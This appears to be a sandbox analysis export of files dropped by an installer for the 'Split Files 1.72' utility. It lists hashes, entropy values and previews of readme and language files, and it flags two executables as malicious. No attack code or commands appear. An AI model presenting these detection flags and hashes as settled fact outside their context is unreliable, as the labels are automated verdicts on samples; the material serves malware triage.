                                        SHA1:58B2B523D4CCB03A07F9B1CB53250F3C6BA0B771
                                        SHA-256:AF9B99F745D2B2F3E688336C68F69C9CADF7E85BF443100DDA4EBB507D86155A
                                        SHA-512:6F202138BE4B009152A72AB671A4C5D3AE5580211EDE11F4E35B89F2F1EF58E8B8DBD35E9DA1D12B7ABDD3BFD4EE342541DE8DE2437D0FCEA77A1C5782AE0E2A
                                        Malicious:false
                                        Reputation:moderate, very likely benign file
                                        Preview:Split Files 1.72....Contents:....1. Description...2. History...3. Localization...4. Contacts.....-----------------------------------------------------------------....1. Description.....Fast and easy file splitter and joiner...Split files by parts size or parts number...Create .bat file to merge parts without program.....-----------------------------------------------------------------....2. Development History:....17.10.2010 - update to version 1.72....- large files splitting error fix (over 2 Gb)..- new language: turkish....9.02.2010 - update to version 1.71....- split and join options in windows explorer pop-up menu....16.01.2010 - update to version 1.7....- new languages: dutch, italian, spanish..- delete input file after splitting....3.01.2010 - update to version 1.6....- compression (zip)..- drag and drop..- french language..- arabic language..- interface was changed....18.11.2008 - update to version 1.5....- large files splitting error fix (over 1 Gb)..- output folder selection..
                                        Process:C:\Users\user\AppData\Local\Temp\is-LMEP0.tmp\is-DTRND.tmp
                                        File Type:ISO-8859 text, with very long lines (1053), with CRLF line terminators
                                        Category:dropped
                                        Size (bytes):2942
                                        Entropy (8bit):5.0506474169868945
                                        Encrypted:false
                                        SSDEEP:48:mRIjSLoZpLobGyYly6y4cMUNYzLEDa3dMSsXNBIi3Dl0r4k1z9bcX4Xl9asUvn6d:IW7Lob1YEgcMiDa3WN7BW1zLV1mngV4+
                                        MD5:58D65074A58BC8EAE2D5A3B589399A53
                                        SHA1:074E7E5BFD52200086309913670D49BA664FB279
                                        SHA-256:2F2487EDEEEA0D35394FD1C0B72D9C1FBF617DD014ED659083BDB0EFB12F6C90
                                        SHA-512:C0806DFC9DCD2A620693115679057B5374DEA3930E02F2B8DD1390C843D3F7C138CA8576CA35A5BCBEEA68E5CD9F5193C8D564A942C5A179DB9C5E6CAAA00266
                                        Malicious:false
                                        Reputation:moderate, very likely benign file
                                        Preview:Split Files 1.72..............:....1. ...........2. ..........3. .............-----------------------------------------------------------------....1. ...................... ............. ... .......... ...... .. ..... ...... ..... . ............ .. .......... . ........ ..... ..... ..... ... ............ ... ........ ...... .. ......, ....... ........... ..... ........... ....... ... ........ .......... ....... ........ .... . .......... ... ..... ........... ..... ...... ........ ... ........ ..........: .. ..... ......, .. ....... ...... ...... ..... ..... ......... . ......, .........., .........., ........... ..... ....... .bat .... ... .......... ...... ... .......... ... ..... .......... ......... .bat .... . ..... ... ......... ..... ...... ... ............. . .bat ..... ........ ..... ........ ...... ..... ........ ...... ......... ...... ..... ..... ..... ..... ....., ........... zip ........... ... ...... ..... .......... ....... ...... ....., ....... ........ ........... ..
                                        Process:C:\Users\user\AppData\Local\Temp\is-LMEP0.tmp\is-DTRND.tmp
                                        File Type:PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows
                                        Category:modified
                                        Size (bytes):3491315
                                        Entropy (8bit):5.600225128146387
                                        Encrypted:false
                                        SSDEEP:24576:8kvs+hjRbEtvgIyhbpegN4X94JFlWchs9F4AyM1n6iuAdsGR0A2O3DyLaYtBlecd:8VQj5EtvSpZvJFIp9IM1ft22mHBldXXL
                                        MD5:361518D6CC3C25EEC2DFC1DE82B055B2
                                        SHA1:5B298ED47BDEFA0BB953F277649CCB7C3A308C3C
                                        SHA-256:616BB3AC1AE4651819FCD80CB8357940061AF64A21401C33E8C84CFF41679211
                                        SHA-512:4EFAC7D2D772FDD8D3DAC80CE7874D5E85957D39B8F1392E00CF8969F87076A1146363990212ED79E63ADEF92427514E3E7D957B2E3E3D056E5A6741D57FA030
                                        Malicious:true
                                        Antivirus:
                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....~.c.........._...............................@..........................P......]m5..............................................P...e...........................................................................................................text...2........................... ..`.rdata...+.......0..................@..@.data........0.......0..............@....tls.... ....@.......@..............@....rsrc....p...P...p...P..............@..@.ave131...+......+.................`.*.................................................................................................................................................................................................................................................................................................................................................................................................
                                        Process:C:\Users\user\AppData\Local\Temp\is-LMEP0.tmp\is-DTRND.tmp
                                        File Type:ISO-8859 text, with very long lines (1053), with CRLF line terminators
                                        Category:dropped
                                        Size (bytes):2942
                                        Entropy (8bit):5.0506474169868945
                                        Encrypted:false
                                        SSDEEP:48:mRIjSLoZpLobGyYly6y4cMUNYzLEDa3dMSsXNBIi3Dl0r4k1z9bcX4Xl9asUvn6d:IW7Lob1YEgcMiDa3WN7BW1zLV1mngV4+
                                        MD5:58D65074A58BC8EAE2D5A3B589399A53
                                        SHA1:074E7E5BFD52200086309913670D49BA664FB279
                                        SHA-256:2F2487EDEEEA0D35394FD1C0B72D9C1FBF617DD014ED659083BDB0EFB12F6C90
                                        SHA-512:C0806DFC9DCD2A620693115679057B5374DEA3930E02F2B8DD1390C843D3F7C138CA8576CA35A5BCBEEA68E5CD9F5193C8D564A942C5A179DB9C5E6CAAA00266
                                        Malicious:false
                                        Preview:Split Files 1.72..............:....1. ...........2. ..........3. .............-----------------------------------------------------------------....1. ...................... ............. ... .......... ...... .. ..... ...... ..... . ............ .. .......... . ........ ..... ..... ..... ... ............ ... ........ ...... .. ......, ....... ........... ..... ........... ....... ... ........ .......... ....... ........ .... . .......... ... ..... ........... ..... ...... ........ ... ........ ..........: .. ..... ......, .. ....... ...... ...... ..... ..... ......... . ......, .........., .........., ........... ..... ....... .bat .... ... .......... ...... ... .......... ... ..... .......... ......... .bat .... . ..... ... ......... ..... ...... ... ............. . .bat ..... ........ ..... ........ ...... ..... ........ ...... ......... ...... ..... ..... ..... ..... ....., ........... zip ........... ... ...... ..... .......... ....... ...... ....., ....... ........ ........... ..
                                        Process:C:\Users\user\AppData\Local\Temp\is-LMEP0.tmp\is-DTRND.tmp
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):3491315
                                        Entropy (8bit):5.600224518949536
                                        Encrypted:false
                                        SSDEEP:24576:3kvs+hjRbEtvgIyhbpegN4X94JFlWchs9F4AyM1n6iuAdsGR0A2O3DyLaYtBlecd:3VQj5EtvSpZvJFIp9IM1ft22mHBldXXL
                                        MD5:F488A4815DE52F915E37E40EA88B011F
                                        SHA1:16F9954F5E9FE6CB50125396B7DB524218D01237
                                        SHA-256:E13C9E749995269A3C45C6464B2F0BF55283288FD020FE4D0F1CA811142CC2AC
                                        SHA-512:04262ADC77B3126FCB9A8991612DDCFC35DF7F35988D108079A0BACF04350C57E829CA8E8C74833D0A0D9D9CD1DD480B9F4FA7145051AECF85D23C85A90667E2
                                        Malicious:false
                                        Preview:.Z......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....~.c.........._...............................@..........................P......]m5..............................................P...e...........................................................................................................text...2........................... ..`.rdata...+.......0..................@..@.data........0.......0..............@....tls.... ....@.......@..............@....rsrc....p...P...p...P..............@..@.ave131...+......+.................`.*.................................................................................................................................................................................................................................................................................................................................................................................................
                                        Process:C:\Users\user\AppData\Local\Temp\is-LMEP0.tmp\is-DTRND.tmp
                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                        Category:dropped
                                        Size (bytes):789258
                                        Entropy (8bit):6.369988626022893
                                        Encrypted:false
                                        SSDEEP:12288:EpmOmg1k2bfrP437QzH/A6A40lG77NzknuGyJOxOU:emt2bfrP437QzH/A6A7E7dVPUxOU
                                        MD5:D3BA43B9E1B3838F28AFC558F2991D5B
                                        SHA1:1132F1C76760281A591F7DF99D592283103FCC87
                                        SHA-256:1E95FE5D06884DF82D2BEAEDA09434ECAC2A347AEC5F03E71F20E39FB6C9E0E9
                                        SHA-512:870371843F59B91D75B6C4D4C637075235D25CF3ABB059B58E39F9CD2833533A8F434307E7AD1175FD45082D3B4E4F0ED79F303ED77DEF553587E2819C092022
                                        Malicious:true
                                        Joe Sandbox View:
                                        • Filename: file.exe, Detection: malicious, Browse
                                        • Filename: file.exe, Detection: malicious, Browse
                                        • Filename: file.exe, Detection: malicious, Browse
                                        • Filename: file.exe, Detection: malicious, Browse
                                        • Filename: file.exe, Detection: malicious, Browse
                                        • Filename: file.exe, Detection: malicious, Browse
                                        • Filename: file.exe, Detection: malicious, Browse
                                        • Filename: file.exe, Detection: malicious, Browse
                                        • Filename: file.exe, Detection: malicious, Browse
                                        • Filename: file.exe, Detection: malicious, Browse
                                        • Filename: file.exe, Detection: malicious, Browse
                                        • Filename: file.exe, Detection: malicious, Browse
                                        Preview:MZP.....................@.......................InUn....................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.....................4......X.............@..............................................@...............................%......l....................@...............................0......................................................CODE....l........................... ..`DATA................................@...BSS.....p................................idata...%.......&..................@....tls......... ...........................rdata.......0......................@..P.reloc..t....@......................@..P.rsrc...l...........................@..P....................................@..P........................................................................................................................................
                                        Process:C:\Users\user\AppData\Local\Temp\is-LMEP0.tmp\is-DTRND.tmp
                                        File Type:MS Windows 95 Internet shortcut text (URL=<http://www.altarsoft.com/split_files.shtml>), ASCII text, with CRLF line terminators
                                        Category:dropped
                                        Size (bytes):97
                                        Entropy (8bit):5.12302231676258
                                        Encrypted:false
                                        SSDEEP:3:HRAbABGQYm/0S4UEtSNM5LTJOBCBuQpQQXXy:HRYFVm/r4UEtSeVTJuZQplHy
                                        MD5:DCD6923B008121BFF4C7C0AA1206286E
                                        SHA1:AD4EF16A96A80C8EA5DBC5933229580BC6C332E0
                                        SHA-256:E1E01BFA5E2B5A117A627F7E9E861CF63D852A66BCE0DF88094D59CAF61E4376
                                        SHA-512:EC4A399EB38A1FA64DF8990708168F134ACD0CA793930E57C6D3A260A537B20DFD9F8B7232987F32EC1C1A7CEC7EC91F15A644A63D275104D96588FC3D354B5C
                                        Malicious:false
                                        Preview:[InternetShortcut]..URL=http://www.altarsoft.com/split_files.shtml..Modified=500425EA770BCC01B2..
                                        Process:C:\Users\user\AppData\Local\Temp\is-LMEP0.tmp\is-DTRND.tmp
                                        File Type:ISO-8859 text, with CRLF line terminators
                                        Category:dropped
                                        Size (bytes):2193
                                        Entropy (8bit):4.702648325021821
                                        Encrypted:false
                                        SSDEEP:24:ElZ5/fnS3LWjwbf2VQZl5HXvbap4qDwGApRAboaGnMAzPelJoEhLifJy:mZ3jwbf2V25HjcwGpbpGMaelXh2g
                                        MD5:EA42A2F0D0B4CBE042DE38568E18F1AC
                                        SHA1:58B2B523D4CCB03A07F9B1CB53250F3C6BA0B771
                                        SHA-256:AF9B99F745D2B2F3E688336C68F69C9CADF7E85BF443100DDA4EBB507D86155A
                                        SHA-512:6F202138BE4B009152A72AB671A4C5D3AE5580211EDE11F4E35B89F2F1EF58E8B8DBD35E9DA1D12B7ABDD3BFD4EE342541DE8DE2437D0FCEA77A1C5782AE0E2A
                                        Malicious:false
                                        Preview:Split Files 1.72....Contents:....1. Description...2. History...3. Localization...4. Contacts.....-----------------------------------------------------------------....1. Description.....Fast and easy file splitter and joiner...Split files by parts size or parts number...Create .bat file to merge parts without program.....-----------------------------------------------------------------....2. Development History:....17.10.2010 - update to version 1.72....- large files splitting error fix (over 2 Gb)..- new language: turkish....9.02.2010 - update to version 1.71....- split and join options in windows explorer pop-up menu....16.01.2010 - update to version 1.7....- new languages: dutch, italian, spanish..- delete input file after splitting....3.01.2010 - update to version 1.6....- compression (zip)..- drag and drop..- french language..- arabic language..- interface was changed....18.11.2008 - update to version 1.5....- large files splitting error fix (over 1 Gb)..- output folder selection..
                                        Process:C:\Users\user\AppData\Local\Temp\is-LMEP0.tmp\is-DTRND.tmp
                                        File Type:ISO-8859 text, with CRLF line terminators
                                        Category:dropped
                                        Size (bytes):2266
                                        Entropy (8bit):5.4593359267896355
                                        Encrypted:false
                                        SSDEEP:48:HG8il+sqirh7zJ9YTHskp1r4phFAqLNnK9h:HGkSkp1r4NTKf
                                        MD5:4ABA9765EB3555788F5706D87A9D2DCA
                                        SHA1:36C0895FBF9F99690CA55C54CC56310E24513113
                                        SHA-256:E99B943206594C04BC0383669D04D4F191A501F46D2474FED08B997F8020B433
                                        SHA-512:3498485635AFC548663715D22071611BAB10C707E8E24BE0B5143EE4A27727DA7D18A5E6959E3F6DD7D0F615DDFD50CE9FC5CE8AE6DDC5BEE287B5A00A817288
                                        Malicious:false
                                        Preview:[Interface]....MFile->Caption = '...'..MExit->Caption =' ....'..MOptions->Caption = 'Options'..MSettings->Caption =' .........'..MLanguage->Caption =' ......'..MLangArabic->Caption = 'Arabic'..MLangChinese->Caption = 'Chinese'..MLangDutch->Caption = 'Dutch'..MLangEnglish->Caption =' .......'..MLangFrench->Caption = 'French'..MLangItalian->Caption = 'Italian'..MLangRussian->Caption = '....'..MLangSpanish->Caption = 'Spanish'..MLangTurkish->Caption = 'Turkish'..MHelp->Caption =' .......'..MAbout->Caption =' ...'....TabSheetSplit->Caption = ' ... .......'..TabSheetCombine->Caption = ' ...'....GroupBoxCombine->Caption =' ... .......'..LabelFirstFile->Caption = '..... .....:'..LabelOutput->Caption = '... ....:'..LabelCombineFolder->Caption =' .... ......:'..LabelSplitFolder->Caption = '.... ......:'..ButtonCombine->Caption =' ...'..ButtonStopCombine->Caption = '....'....GroupBoxSplit->Caption = '... .......'..LabelFileName->Caption =' ..... ...: '..LabelSplitFolder->Caption =' .... ......:'
                                        Process:C:\Users\user\AppData\Local\Temp\is-LMEP0.tmp\is-DTRND.tmp
                                        File Type:ISO-8859 text, with CRLF line terminators
                                        Category:dropped
                                        Size (bytes):2345
                                        Entropy (8bit):5.847861612631974
                                        Encrypted:false
                                        SSDEEP:48:HGj2lE8qiTh7XJ9zHadtPTTD1n34q1jgun1ITq8K:HG5RDTln34qRgusK
                                        MD5:A5C9FEA89EFE8E2162BA477E8EA39B44
                                        SHA1:E6A2042C574D14786891F0C32F92C8292BBB4ACA
                                        SHA-256:8DDFB50DACA491296101BAB3DB9B77C7587127E684D9E22EFD6DC93F84A008FA
                                        SHA-512:3F7944F262717D308A1235982E741536DA6A4DF9ABEE4E2811E1151B53C3D31811EA3EB750ED39F347F7DF14AD20FF981C85CC2DA297BE745547B36D41B8FDB9
                                        Malicious:false
                                        Preview:[Interface]....MFile->Caption = '...(&F)'..MExit->Caption = '.......'..MOptions->Caption = '...'..MSettings->Caption = '....'..MLanguage->Caption = '....'..MLangArabic->Caption = 'Arabic'..MLangChinese->Caption = '........'..MLangDutch->Caption = 'Dutch'..MLangEnglish->Caption = 'English'..MLangFrench->Caption = 'French'..MLangItalian->Caption = 'Italian'..MLangRussian->Caption = 'Russian'..MLangSpanish->Caption = 'Spanish'..MLangTurkish->Caption = 'Turkish'..MHelp->Caption = '....'..MAbout->Caption = '....'....TabSheetSplit->Caption = '...'..TabSheetCombine->Caption = '...'....GroupBoxCombine->Caption = ' .......... "......" .............'..LabelFirstFile->Caption = '......'..LabelOutput->Caption = '..........'..LabelCombineFolder->Caption = '.........'..LabelSplitFolder->Caption = '.........'..ButtonCombine->Caption = '...'..ButtonStopCombine->Caption = '..'....GroupBoxSplit->Caption = ' .......... "......."............. '..LabelFileName->Caption = '.
                                        Process:C:\Users\user\AppData\Local\Temp\is-LMEP0.tmp\is-DTRND.tmp
                                        File Type:ISO-8859 text, with CRLF line terminators
                                        Category:dropped
                                        Size (bytes):2687
                                        Entropy (8bit):5.051567814097503
                                        Encrypted:false
                                        SSDEEP:48:HGgXRVA+sqgh59WJIo4yvHIExBMHkWREHZDNbHBsBOtiSZls5crRMfiE:HGusSgEvMHfREHN9hsoiOUBiE
                                        MD5:D2471D35D833E2544D67365E015E6153
                                        SHA1:497EE8FF9519D025BD10C5AA15DDC34DFB1B334B
                                        SHA-256:4831DDBCFE327E2542F4565E7A948C5828D71003B8444723E1E11BA6BB43ACE7
                                        SHA-512:C82B30D604A679F87B8D0B1670A0D1607E25150FFCFD1C9E631241916BA93CEB5A33AFCAA9080149096ACA1913791384860F5699F2BB302B6CB190AF777EB3CE
                                        Malicious:false
                                        Preview:[Interface]....MFile->Caption = '&File'..MExit->Caption = 'Programma Afsluiten'..MOptions->Caption = 'Options'..MSettings->Caption = 'Instellingen'..MLanguage->Caption = 'Kies Taal'..MLangArabic->Caption = 'Arabisch'..MLangChinese->Caption = 'Chinese'..MLangDutch->Caption = 'Nederlands'..MLangEnglish->Caption = 'Engels'..MLangFrench->Caption = 'Frans'..MLangItalian->Caption = 'Italiaans'..MLangRussian->Caption = 'Russisch'..MLangSpanish->Caption = 'Spaans'..MLangTurkish->Caption = 'Turkish'..MHelp->Caption = 'Hulp'..MAbout->Caption = 'Info'....TabSheetSplit->Caption = 'SPLITSEN'..TabSheetCombine->Caption = 'HERENIGEN'....GroupBoxCombine->Caption = ' Drag and drop een van de te herenigen delen in 'Eerste Deel' of browse ernaartoe '..LabelFirstFile->Caption = 'Eerste Deel:'..LabelOutput->Caption = 'Output Bestandsnaam:'..LabelCombineFolder->Caption = 'Output Map:'..LabelSplitFolder->Caption = 'Output Map:'..ButtonCombine->Caption = 'HERENIGEN'..ButtonStopCombine->Caption = 'STOP'....Grou
                                        Process:C:\Users\user\AppData\Local\Temp\is-LMEP0.tmp\is-DTRND.tmp
                                        File Type:ASCII text, with CRLF line terminators
                                        Category:dropped
                                        Size (bytes):2594
                                        Entropy (8bit):5.044497576650396
                                        Encrypted:false
                                        SSDEEP:48:HGgb5l+sqiTh7XJ9oVHo1xx0GHLVQ4ZWGAtDAEQmUDcQdWym:HGdpa1jfHLVQ4AGAtWma8H
                                        MD5:76776746B3CFF1CBD5D56CD44CA2DEF5
                                        SHA1:2F2ECA50BD7F72232BE84291EF1A7956C24098CC
                                        SHA-256:EC647D30931F50607CF745D958AAF0367CCEAB9999346188255CFBFB22301EE3
                                        SHA-512:202436C708D4F34FFCCDC3D33841246C5CEE073AC270DA547C15F9E995A08D36AE4C00982283BF60D62363046BBEAA0125D59075E4629A9D1934039CBFB00BE5
                                        Malicious:false
                                        Preview:[Interface]....MFile->Caption = '&File'..MExit->Caption = 'Exit Application'..MOptions->Caption = 'Options'..MSettings->Caption = 'Settings'..MLanguage->Caption = 'Language'..MLangArabic->Caption = 'Arabic'..MLangChinese->Caption = 'Chinese'..MLangDutch->Caption = 'Dutch'..MLangEnglish->Caption = 'English'..MLangFrench->Caption = 'French'..MLangItalian->Caption = 'Italian'..MLangRussian->Caption = 'Russian'..MLangSpanish->Caption = 'Spanish'..MLangTurkish->Caption = 'Turkish'..MHelp->Caption = 'Help'..MAbout->Caption = 'About'....TabSheetSplit->Caption = 'SPLIT'..TabSheetCombine->Caption = 'JOIN'....GroupBoxCombine->Caption = ' Drag and drop one of the files to join in the 'First Part' box or browse to it '..LabelFirstFile->Caption = 'First Part:'..LabelOutput->Caption = 'Output File Name:'..LabelCombineFolder->Caption = 'Output Folder:'..LabelSplitFolder->Caption = 'Output Folder:'..ButtonCombine->Caption = 'JOIN'..ButtonStopCombine->Caption = 'STOP'....GroupBoxSplit->Caption = ' Drag
                                        Process:C:\Users\user\AppData\Local\Temp\is-LMEP0.tmp\is-DTRND.tmp
                                        File Type:ISO-8859 text, with CRLF line terminators
                                        Category:dropped
                                        Size (bytes):2507
                                        Entropy (8bit):5.040552699764577
                                        Encrypted:false
                                        SSDEEP:48:HGkOA+sq/W7Yve3EkHaBSDbSljMM+v1/D3H:HGb8hABSDbSJMBD
                                        MD5:336D33F55222F48FBA19EF0911732766
                                        SHA1:E17A78E3B48192361DB540B1E8C9D0548C9A9FFE
                                        SHA-256:0E955453FA27CED0D0521F0F960C7743C2090F06263D33EC8FA978B681123E0C
                                        SHA-512:67EC6B859BCDD66DA59CDB1DC1A4EACFBDA12C57699012EE1573DD88F5AAAB6288E1BD9015C862689F4A1A27E83B28C3A9C99B1895EDF4F47D6F94B0557CDC1F
                                        Malicious:false
                                        Preview:[Interface]....MFile->Caption = '&Fichier'..MExit->Caption = 'Quitter'..MOptions->Caption = 'Options'..MSettings->Caption = 'Settings'..MLanguage->Caption = 'Langage'..MLangArabic->Caption = 'Arabe'..MLangChinese->Caption = 'Chinese'..MLangDutch->Caption = 'Flamand'..MLangEnglish->Caption = 'Englais'..MLangFrench->Caption = 'Francais'..MLangItalian->Caption = 'Italien'..MLangRussian->Caption = 'Russe'..MLangSpanish->Caption = 'Espagnol'..MLangTurkish->Caption = 'Turkish'..MHelp->Caption = 'Aide'..MAbout->Caption = 'A propos de ..'....TabSheetSplit->Caption = 'Scinder'..TabSheetCombine->Caption = 'Assembler'....GroupBoxCombine->Caption = ' Faire glisser un des fichiers bloc . assembler ou rechercher le par ... '..LabelFirstFile->Caption = 'Premier Fichier:'..LabelOutput->Caption = 'Fichier de sortie: '..LabelCombineFolder->Caption = 'R.pertoire Dest.'..LabelSplitFolder->Caption = 'R.pertoire Dest.'..ButtonCombine->Caption = 'Assembler'..ButtonStopCombine->Caption = 'Stop'....GroupBoxSpl
                                        Process:C:\Users\user\AppData\Local\Temp\is-LMEP0.tmp\is-DTRND.tmp
                                        File Type:ISO-8859 text, with CRLF line terminators
                                        Category:dropped
                                        Size (bytes):2729
                                        Entropy (8bit):5.029883215699414
                                        Encrypted:false
                                        SSDEEP:48:HGgS7++sqMsmQYEJK7bHExsA9GZ1MTn6btlOWH6r3zvX5c9WYN:HGjUoR9GXML6RYWH6rDRdYN
                                        MD5:8AFE543CB6791AA250312EBA61BF7C13
                                        SHA1:BFD229D43BE86728A634055AD65860157C2671BD
                                        SHA-256:AF5BFB663E715C48C55E24BC3BEA30FCAA9BE8EAF35133FBB75D54C5735696AC
                                        SHA-512:5CF85F84DD6D363B2AAC720CF10C5289350EB706DC2BF5CA824CF220C3607CC7969CDD2F4B2912DC97C7BE50CEDC24A9A01AFC585CE84B6B8CB81419153931A2
                                        Malicious:false
                                        Preview:[Interface]....MFile->Caption = '&File'..MExit->Caption = 'Termina programma'..MOptions->Caption = 'Options'..MSettings->Caption = 'Impostazioni'..MLanguage->Caption = 'Seleziona Lingua'..MLangArabic->Caption = 'Arabo'..MLangChinese->Caption = 'Chinese'..MLangDutch->Caption = 'Olandese'..MLangEnglish->Caption = 'Inglese'..MLangFrench->Caption = 'Francese'..MLangItalian->Caption = 'Italiano'..MLangRussian->Caption = 'Russo'..MLangSpanish->Caption = 'Spagnolo'..MLangTurkish->Caption = 'Turkish'..MHelp->Caption = 'Aiuto'..MAbout->Caption = 'Informazioni'....TabSheetSplit->Caption = 'DIVIDI'..TabSheetCombine->Caption = 'UNISCI'....GroupBoxCombine->Caption = ' Drag and drop una delle parti da unire nella casella 'Prima Parte' o segui percorso '..LabelFirstFile->Caption = 'Prima Parte:'..LabelOutput->Caption = 'Nome File Uscita:'..LabelCombineFolder->Caption = 'Cartella Uscita:'..LabelSplitFolder->Caption = 'Cartella Uscita:'..ButtonCombine->Caption = 'UNISCI'..ButtonStopCombine->Caption = '
                                        Process:C:\Users\user\AppData\Local\Temp\is-LMEP0.tmp\is-DTRND.tmp
                                        File Type:ISO-8859 text, with CRLF line terminators
                                        Category:dropped
                                        Size (bytes):2299
                                        Entropy (8bit):5.691502190790686
                                        Encrypted:false
                                        SSDEEP:48:HG9uhjkDYhqGQjsONHiHQgGU9dm6nclk6a1hg22mo6LD:HGnzLIQTUPmcclGsmogD
                                        MD5:F9F47FF3D866FFC4F38E315E41356E55
                                        SHA1:EFC313A99993B5FB8A454D4C5197C6F3965B5C89
                                        SHA-256:3A13CCE54190BF4A679D21F61466A0A18E9340287CAA1AA4EACB38C99C9D4957
                                        SHA-512:6EC1F1E19921C535A50254500ED01602DA74D3CC9E6DA8B5FC78D89255E42C5968BD294E56F584EE273630B9233C20CAFEBC906354CE393FE1CFFE91528F527A
                                        Malicious:false
                                        Preview:[Interface]....MFile->Caption = '&....'..MExit->Caption = '.....'..MOptions->Caption = '.....'..MSettings->Caption = '.........'..MLanguage->Caption = '....'..MLangEnglish->Caption = '..........'..MLangRussian->Caption = '.......'..MLangArabic->Caption = '........'..MLangChinese->Caption = '.........'..MLangDutch->Caption = '.......'..MLangFrench->Caption = '...........'..MLangItalian->Caption = '...........'..MLangSpanish->Caption = '.........'..MLangTurkish->Caption = 'Turkish'..MHelp->Caption = '......'..MAbout->Caption = '. .........'....TabSheetSplit->Caption = '.......'..TabSheetCombine->Caption = '.......'....GroupBoxCombine->Caption = ' ....... ..... '..LabelFirstFile->Caption = '1-. ....:'..LabelOutput->Caption = '........: '..LabelCombineFolder->Caption = '..........:'..ButtonCombine->Caption = '.......'..ButtonStopCombine->Caption = '....'....GroupBoxSplit->Caption = ' ....... .... '..LabelSplitFolder->Caption = '..........:'..LabelFileName->Caption = '... .....:'..LabelFile
                                        Process:C:\Users\user\AppData\Local\Temp\is-LMEP0.tmp\is-DTRND.tmp
                                        File Type:ISO-8859 text, with CRLF line terminators
                                        Category:dropped
                                        Size (bytes):2718
                                        Entropy (8bit):5.057121428169199
                                        Encrypted:false
                                        SSDEEP:48:HGPWFaxAA+sqKvFYLcunHh3QxXOBp1OB5r70h3CGRsJE0laDwXCqXH5wGF5JoCPa:HGPAPZBAJU1k7Jb245xVfUMG
                                        MD5:21B4D47F5D851271C89310C92777FB70
                                        SHA1:9D85FF8F7107CFAE3F31993FAF7F249591AFCB27
                                        SHA-256:D88AE9E292EBC4E56767892FD451E2E8278FCE776CAD689731EE7875748D55D7
                                        SHA-512:46F26B51D6959A36E33266887E39CB98E7E67880052DE8DE741CB93C90ED3B28C87A224CE710E6C698FE648ED8B062E73DEDC253A6C5A8362EB3EF2792AB4FBF
                                        Malicious:false
                                        Preview:[Interface]....MFile->Caption = '&Archivo'..MExit->Caption = 'Salir'..MOptions->Caption = 'Options'..MSettings->Caption = 'Herramientas'..MLanguage->Caption = 'Elegir idioma'..MLangArabic->Caption = 'Arabe'..MLangChinese->Caption = 'Chinese'..MLangDutch->Caption = 'Holand.s'..MLangEnglish->Caption = 'Ingl.s'..MLangFrench->Caption = 'Franc.s'..MLangItalian->Caption = 'Italiano'..MLangRussian->Caption = 'Ruso'..MLangSpanish->Caption = 'Espa.ol'..MLangTurkish->Caption = 'Turkish'..MHelp->Caption = 'Ayuda'..MAbout->Caption = 'Sobre programa'....TabSheetSplit->Caption = 'SEPARAR'..TabSheetCombine->Caption = 'JUNTAR'....GroupBoxCombine->Caption = ' Drag and drop una de las partes para juntar en la celda 'Primera Parte' o navegar '..LabelFirstFile->Caption = 'Primera Parte:'..LabelOutput->Caption = 'Nombre Archivo salida:'..LabelCombineFolder->Caption = 'Carpeta salida:'..LabelSplitFolder->Caption = 'Carpeta salida:'..ButtonCombine->Caption = 'JUNTAR'..ButtonStopCombine->Caption = 'PARAR'....
                                        Process:C:\Users\user\AppData\Local\Temp\is-LMEP0.tmp\is-DTRND.tmp
                                        File Type:ISO-8859 text, with CRLF line terminators
                                        Category:dropped
                                        Size (bytes):2607
                                        Entropy (8bit):5.234177949162883
                                        Encrypted:false
                                        SSDEEP:48:HGUyjEiB0w3l+sqiTh7XJ9UeHjIDt00AoB/nheSSMpSSSxPYe:HGpNBrkGIDt0qnheS9Sx
                                        MD5:E1271E0DDD609CD7F9C2367D32FEBE4B
                                        SHA1:0A420424F1FADE0BFF002E63AAD22B5E94B86CAC
                                        SHA-256:AEE6B1EDFFFCE507E2207C7E2AA36DA42B2AC54CEB28B9759B2D05F1012CBA8F
                                        SHA-512:86A11C9E4B59F2437180F56CAD44E69CB29B03B93983EA5E35CBCC5BDD40CFC424EE1EEF519B2E44D67623C79835AF92B4B089AC29890C046CD590C1F8BFA574
                                        Malicious:false
                                        Preview:[Interface]....MFile->Caption = '&Dosya'..MExit->Caption = 'Uygulamay. Kapat'..MOptions->Caption = 'Se.enekler'..MSettings->Caption = 'Ayarlar'..MLanguage->Caption = 'Dil'..MLangArabic->Caption = 'Arabic'..MLangChinese->Caption = 'Chinese'..MLangDutch->Caption = 'Dutch'..MLangEnglish->Caption = 'English'..MLangFrench->Caption = 'French'..MLangItalian->Caption = 'Italian'..MLangRussian->Caption = 'Russian'..MLangSpanish->Caption = 'Spanish'..MLangTurkish->Caption = 'Turkish'..MHelp->Caption = 'Yard.m'..MAbout->Caption = 'Hakk.nda'....TabSheetSplit->Caption = 'PAR.ALA'..TabSheetCombine->Caption = 'B.RLE.T.R'....GroupBoxCombine->Caption = ' .lk par.ay. s.r.kleyin yada g.zat. kullan.n '..LabelFirstFile->Caption = '.lk Par.a:'..LabelOutput->Caption = 'Birle.tirme Ad.:'..LabelCombineFolder->Caption = '..kt. Klas.r.:'..LabelSplitFolder->Caption = '..kt. Klas.r.:'..ButtonCombine->Caption = 'B.RLE.T.R'..ButtonStopCombine->Caption = 'DUR'....GroupBoxSplit->Caption = ' B.lmek istedi.iniz dosyay.
                                        Process:C:\Users\user\AppData\Local\Temp\is-LMEP0.tmp\is-DTRND.tmp
                                        File Type:ISO-8859 text, with CRLF line terminators
                                        Category:dropped
                                        Size (bytes):2718
                                        Entropy (8bit):5.057121428169199
                                        Encrypted:false
                                        SSDEEP:48:HGPWFaxAA+sqKvFYLcunHh3QxXOBp1OB5r70h3CGRsJE0laDwXCqXH5wGF5JoCPa:HGPAPZBAJU1k7Jb245xVfUMG
                                        MD5:21B4D47F5D851271C89310C92777FB70
                                        SHA1:9D85FF8F7107CFAE3F31993FAF7F249591AFCB27
                                        SHA-256:D88AE9E292EBC4E56767892FD451E2E8278FCE776CAD689731EE7875748D55D7
                                        SHA-512:46F26B51D6959A36E33266887E39CB98E7E67880052DE8DE741CB93C90ED3B28C87A224CE710E6C698FE648ED8B062E73DEDC253A6C5A8362EB3EF2792AB4FBF
                                        Malicious:false
